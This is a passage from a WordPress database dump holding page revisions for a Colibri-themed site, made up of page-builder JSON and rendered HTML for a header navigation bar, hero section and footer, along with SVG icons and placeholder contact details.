767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-12 16:36:28','2023-10-12 20:36:28','',182,'https://gsudice.dataconn.net/?p=1661',0,'revision','',0),(1662,1,'2023-10-12 16:36:28','2023-10-12 20:36:28','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-12 16:36:28','2023-10-12 20:36:28','',26,'https://gsudice.dataconn.net/?p=1662',0,'revision','',0),(1663,1,'2023-10-12 16:36:28','2023-10-12 20:36:28','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-12 16:36:28','2023-10-12 20:36:28','',25,'https://gsudice.dataconn.net/?p=1663',0,'revision','',0),(1664,1,'2023-10-12 16:36:28','2023-10-12 20:36:28','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-12 16:36:28','2023-10-12 20:36:28','',29,'https://gsudice.dataconn.net/?p=1664',0,'revision','',0),(1665,1,'2023-10-12 16:36:28','2023-10-12 20:36:28','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 